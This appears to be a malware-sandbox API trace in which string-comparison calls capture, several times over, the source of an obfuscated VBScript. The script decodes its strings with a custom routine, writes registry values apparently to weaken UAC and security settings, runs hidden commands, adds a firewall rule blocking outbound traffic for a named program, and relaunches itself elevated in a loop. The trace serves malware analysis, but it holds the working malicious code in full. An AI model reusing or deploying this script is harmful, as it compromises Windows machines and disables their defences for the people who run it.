(fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.927] wcsncmp (_String1="CHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.927] wcsncmp (_String1="HAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 59 [0222.928] wcsncmp (_String1="AVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 52 [0222.928] wcsncmp (_String1="VE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 